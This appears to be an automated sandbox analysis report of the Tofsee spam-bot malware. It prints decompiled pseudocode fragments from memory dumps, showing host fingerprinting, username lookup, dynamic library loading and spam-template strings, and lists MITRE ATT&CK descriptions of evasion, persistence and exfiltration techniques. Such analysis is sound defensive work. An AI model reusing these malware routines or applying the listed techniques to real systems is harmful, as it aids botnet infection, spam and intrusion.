Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountTickwsprintf
String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
API String ID: 2424974917-1012700906
Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50

Uniqueness

Uniqueness Score: -1.00%

Function 004038F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t29;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;
				}
				_t29 = E004030FA(0x412c00);
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x412c00 =  *0x412c00 & 0x00000000;
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x412bfc == 0) {
									E00406509(_t34);
									 *0x412bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}

APIs

Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128

GetCurrentThreadId.KERNEL32 ref: 00403929
GetCurrentThreadId.KERNEL32 ref: 00403939

Strings

%FROM_EMAIL, xrefs: 00403913

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentThread$CountExchangeInterlockedTick
String ID: %FROM_EMAIL
API String ID: 3716169038-2903620461
Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 02167086, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 021670A5
LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 021670DD

Strings

|, xrefs: 021670CF

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Name$AccountLookupUser
String ID: |
API String ID: 2370142434-2343686810
Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction ID: 8bfeaac2f58a33b9a487dc2134f56d20197ce985b82f5c32c2018b5691a21e95
Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction Fuzzy Hash: 4911F172A40118EBDB12DFD5CC48AEEF7BCEB04709F144167D501E6194DB709759CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00401AC3();
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0040ECA5() & 0x7fffffff;
				}
				return _t28;
			}

0x00401b7e
0x00401b84
0x00401b85
0x00401b86
0x00401b87
0x00401b89
0x00401b8c
0x00401b8d
0x00401b94
0x00401ba3
0x00401bb8
0x00401bc8
0x00401bca
0x00401bcd
0x00000000
0x00401bd8
0x00000000

APIs

Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,?,?,?,00000001), ref: 00401AE9

GetComputerNameA.KERNEL32 ref: 00401BA3
GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8

Strings

localcfg, xrefs: 00401B7B

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressComputerInformationLibraryLoadNameProcVolume
String ID: localcfg
API String ID: 2777991786-1857712256
Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_push(0x413640);
							} else {
								_push(0x41363c);
							}
							_t17 = InterlockedIncrement();
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17;
				}
				return _t15;
			}

APIs

lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1

Strings

%FROM_EMAIL, xrefs: 0040AB8C

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: IncrementInterlockedlstrcpyn
String ID: %FROM_EMAIL
API String ID: 224340156-2903620461
Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004026B2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
inet_ntoa.WS2_32(?), ref: 004026E4

Strings

localcfg, xrefs: 004026CD, 004026D2, 004026DE

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: gethostbyaddrinet_ntoa
String ID: localcfg
API String ID: 2112563974-1857712256
Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAE4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x4136f4; // 0x0
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x4136f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}

0x0040eae4
0x0040eaeb
0x0040eb02
0x0040eb0d
0x0040eaed
0x0040eaf2
0x0040eaf8
0x0040eaff
0x00000000
0x0040eb01
0x0040eb01
0x0040eb01
0x0040eaff

APIs

LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,73AFF210,80000001,00000000), ref: 0040EAF2
GetProcAddress.KERNEL32(00000000,00000000,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,73AFF210,80000001), ref: 0040EB07

Strings

ntdll.dll, xrefs: 0040EAED

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: ntdll.dll
API String ID: 2574300362-2227199552
Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C

Uniqueness

Uniqueness Score: -1.00%

Function 00402F22, Relevance: 5.2, APIs: 4, Instructions: 157
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E00402D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0040EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
								E0040EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

APIs

Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,73BCEA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
HeapFree.KERNEL32(00000000), ref: 00402F7A

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$FreeHandleLibraryLoadModuleProcess
String ID:
API String ID: 1017166417-0
Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88

Uniqueness

Uniqueness Score: -1.00%

Function 02163172, Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02162F71: GetModuleHandleA.KERNEL32(?), ref: 02162F8A
Part of subcall function 02162F71: LoadLibraryA.KERNEL32(?), ref: 02162F9A

GetProcessHeap.KERNEL32(00000000,00000000), ref: 021631C3
HeapFree.KERNEL32(00000000), ref: 021631CA

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Heap$FreeHandleLibraryLoadModuleProcess
String ID:
API String ID: 1017166417-0
Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
Instruction ID: 209693f3e2f21e5092e915184f53d53aeb4917a81cd11e7d7048b6c374106d1e
Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
Instruction Fuzzy Hash: D651AF7194024AAFCB059F64D88CAFEB7B5FF05704F1445A9ECA6C7210E7729A29CB90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report HsWJJz7nq4

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Tofsee

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Bitcoin Miner:

System Summary:

Jbx Signature Overview

AV Detection:

Bitcoin Miner:

Compliance:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
